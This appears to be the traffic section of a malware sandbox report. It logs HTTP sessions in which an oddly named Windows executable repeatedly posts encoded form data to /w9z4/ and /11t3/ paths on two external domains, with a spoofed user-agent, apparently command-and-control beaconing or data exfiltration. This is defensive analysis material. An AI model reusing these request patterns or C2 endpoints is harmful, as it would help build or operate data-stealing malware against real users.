                                                                                                                      5192.168.2.649881199.59.243.227802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:52.384960890 CET627OUTPOST /w9z4/ HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.acond-22-mvr.click
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 55 2f 6f 62 54 59 45 72 4d 61 32 75 78 4f 6e 71 2b 43 4d 55 56 64 43 4d 2b 5a 6d 4e 76 64 44 2b 31 44 74 54 45 56 64 62 2f 72 46 41 79 55 32 55 38 62 30 33 46 2b 4a 52 77 70 47 49 54 42 38 38 53 46 46 42 34 4d 62 52 38 6d 6c 4d 51 61 53 44 4f 5a 51 50 52 4e 77 59 54 65 4a 42 7a 39 36 73 31 76 39 61 67 67 65 57 75 34 4b 31 5a 66 51 6c 37 34 45 54 45 35 71 36 72 54 36 68 73 44 53 30 6c 79 2b 72 4a 7a 79 61 39 41 43 4d 50 36 4a 68 6e 69 47 55 31 52 4f 65 39 7a 63 77 58 45 53 65 69 4f 65 7a 53 63 6e 69 4d 69 33 73 7a 35 59 49 6d 47 39 64 43 34 68 71 69 57 34 58 6f 46 38
                                                                                                                      Data Ascii: 4nJt=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGU1ROe9zcwXESeiOezScniMi3sz5YImG9dC4hqiW4XoF8
                                                                                                                      Nov 26, 2024 11:17:53.559665918 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:17:52 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1138
                                                                                                                      x-request-id: 588feb69-6a16-4fb6-a42a-1222364900bc
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                      set-cookie: parking_session=588feb69-6a16-4fb6-a42a-1222364900bc; expires=Tue, 26 Nov 2024 10:32:53 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 26, 2024 11:17:53.559916019 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg4ZmViNjktNmExNi00ZmI2LWE0MmEtMTIyMjM2NDkwMGJjIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.649892199.59.243.227802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:55.052819967 CET651OUTPOST /w9z4/ HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.acond-22-mvr.click
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 35 44 6e 52 48 74 51 46 56 64 65 2f 72 46 4c 53 55 7a 4c 73 62 4a 33 46 6a 38 52 79 74 47 49 54 56 38 38 54 31 46 41 4c 55 61 65 4d 6d 6e 4b 51 61 63 4d 75 5a 51 50 52 4e 77 59 54 4c 69 42 77 4e 36 76 46 66 39 61 46 41 66 49 2b 34 4e 2f 35 66 51 68 37 34 41 54 45 35 49 36 70 6e 55 68 75 4c 53 30 6c 69 2b 73 59 7a 74 54 39 41 49 43 76 37 39 77 43 66 34 52 47 49 4c 42 75 54 48 6f 32 41 33 66 55 54 45 76 68 63 45 77 63 43 31 73 78 68 71 49 47 47 58 66 43 41 68 34 31 61 66 59 63 67 66 72 47 4f 4a 61 4f 78 62 52 42 38 70 4e 59 54 73 4a 56 48 66 4e 67 3d 3d
                                                                                                                      Data Ascii: 4nJt=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcC1sxhqIGGXfCAh41afYcgfrGOJaOxbRB8pNYTsJVHfNg==
                                                                                                                      Nov 26, 2024 11:17:56.180934906 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:17:55 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1138
                                                                                                                      x-request-id: b3a2f688-e0f2-4667-9295-0f188f27588c
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                      set-cookie: parking_session=b3a2f688-e0f2-4667-9295-0f188f27588c; expires=Tue, 26 Nov 2024 10:32:56 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 26, 2024 11:17:56.181469917 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjNhMmY2ODgtZTBmMi00NjY3LTkyOTUtMGYxODhmMjc1ODhjIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.649899199.59.243.227802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:17:57.708513021 CET1664OUTPOST /w9z4/ HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.acond-22-mvr.click
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 78 44 37 30 54 74 53 6d 39 64 5a 2f 72 46 43 79 55 49 4c 73 62 59 33 46 72 6e 52 79 68 38 49 52 74 38 2f 78 39 46 4a 61 55 61 4a 38 6d 6e 49 51 61 64 44 4f 59 53 50 52 64 4b 59 54 62 69 42 77 4e 36 76 47 58 39 54 77 67 66 50 4f 34 4b 31 5a 66 55 6c 37 34 6b 54 45 78 79 36 70 7a 71 68 65 72 53 30 46 53 2b 70 75 76 74 59 39 41 47 42 76 37 6c 77 43 62 64 52 46 73 74 42 76 33 39 6f 30 63 33 53 42 36 75 30 42 68 61 74 50 57 44 73 41 38 55 47 6d 61 69 52 51 78 66 35 44 4f 75 58 64 63 4b 7a 69 61 6d 62 34 34 4c 53 6e 30 49 53 6f 36 4a 42 6d 62 54 51 6e 48 52 7a 4a 45 2f 72 39 59 34 51 50 6b 39 65 70 36 72 58 6f 6a 65 30 7a 68 4f 4e 4c 59 4b 6d 42 63 39 65 38 47 49 72 58 79 45 75 4a 49 62 75 4e 30 4f 41 44 44 61 46 61 6f 6a 32 53 79 37 39 47 69 4c 46 47 48 7a 65 77 66 58 4b 6e 4a 59 65 46 6a 55 57 79 51 55 31 61 39 4d 75 51 69 62 79 7a 79 73 6a 55 4e 67 6d 7a 4f 52 74 [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N9xD70TtSm9dZ/rFCyUILsbY3FrnRyh8IRt8/x9FJaUaJ8mnIQadDOYSPRdKYTbiBwN6vGX9TwgfPO4K1ZfUl74kTExy6pzqherS0FS+puvtY9AGBv7lwCbdRFstBv39o0c3SB6u0BhatPWDsA8UGmaiRQxf5DOuXdcKziamb44LSn0ISo6JBmbTQnHRzJE/r9Y4QPk9ep6rXoje0zhONLYKmBc9e8GIrXyEuJIbuN0OADDaFaoj2Sy79GiLFGHzewfXKnJYeFjUWyQU1a9MuQibyzysjUNgmzORt0G9/HNSDIJMg3RKG8RzFBendy41pqMvE3rZDjh3Z1yqcHPnSJJIR8/mJavhuidnFVgnuKL/4/NerAkxBbzyHkdNivNZqjJf/W15ksTc6ci1NZsmXll2oiAdyva6gI9kV1+si9jkkD+RTQl7AmgO4Sy4na3Bzga8scdxwKJxnsvSrEgu2lOH7iQDR1EpxSKcNXEKtfE5+yUo/P9Mwtum4gIflVGxw39J7gnBWJnFQr8HmfuoCN5Rks7bib8xvpe7a8g1RGmpn5jUcK7zQ0Pc+oQLC26fhA0xd3Avc7W+NF9LPHf09rIVhRB60mAlVlAut4El33L5LUUEvseASOjEKwdgk231g1GN/wQ0TV51Se2kMU/SOqJY3UUyAosJsDQmd5x/TPX8a9thzGXUxnK7ZDjCXLub2rB4S5H20AFKt8q1ml54K5qO4RW7GvVNS0+yEgI2YuygLXAxkKKEWXZwoX4iTjJ+3/HmyC8ku5bJqql5d0i+JODCW1W1q63FDZ3l+06wlI3q+X1qjmYqp6RfYvaTVci+yQA9zxBy+3WktYoy+odOkUVyMR2VscR8kN18rsZaMFWHXe+71dUFR6067Ex99xG9NtgJgP81f8vMmbqHTl03ajwJSntNHqjuLAMcKHxr70b7yLW7PlufSg1rr89pYC+tdXusyO6 [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:17:58.790606022 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:17:58 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1138
                                                                                                                      x-request-id: db95a5a4-ea5e-4f9c-a69c-8c523bedd0cb
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                      set-cookie: parking_session=db95a5a4-ea5e-4f9c-a69c-8c523bedd0cb; expires=Tue, 26 Nov 2024 10:32:58 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 26, 2024 11:17:58.790813923 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGI5NWE1YTQtZWE1ZS00ZjljLWE2OWMtOGM1MjNiZWRkMGNiIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.649905199.59.243.227802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:00.359397888 CET367OUTGET /w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI= HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:18:01.496762037 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:18:00 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1530
                                                                                                                      x-request-id: 2aa9dfd4-785a-4032-8608-51c1ec815ba2
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RvW062cXIMZhiSLQwlOaX02MZFO2+ChFkzTqNtO8/oo0eOyoD2FNHlgDH0j9wdRoAql1DjyNqGTpEsHWuHmmjA==
                                                                                                                      set-cookie: parking_session=2aa9dfd4-785a-4032-8608-51c1ec815ba2; expires=Tue, 26 Nov 2024 10:33:01 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 76 57 30 36 32 63 58 49 4d 5a 68 69 53 4c 51 77 6c 4f 61 58 30 32 4d 5a 46 4f 32 2b 43 68 46 6b 7a 54 71 4e 74 4f 38 2f 6f 6f 30 65 4f 79 6f 44 32 46 4e 48 6c 67 44 48 30 6a 39 77 64 52 6f 41 71 6c 31 44 6a 79 4e 71 47 54 70 45 73 48 57 75 48 6d 6d 6a 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RvW062cXIMZhiSLQwlOaX02MZFO2+ChFkzTqNtO8/oo0eOyoD2FNHlgDH0j9wdRoAql1DjyNqGTpEsHWuHmmjA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 26, 2024 11:18:01.497198105 CET983INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmFhOWRmZDQtNzg1YS00MDMyLTg2MDgtNTFjMWVjODE1YmEyIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.649922146.88.233.115802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:07.863389015 CET624OUTPOST /11t3/ HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.smartcongress.net
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.smartcongress.net/11t3/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2f 61 31 56 74 46 62 6b 4d 54 67 36 75 76 72 32 4d 33 65 4e 48 48 57 36 6e 36 47 39 51 39 78 54 4b 70 74 6d 35 56 39 75 4d 47 32 52
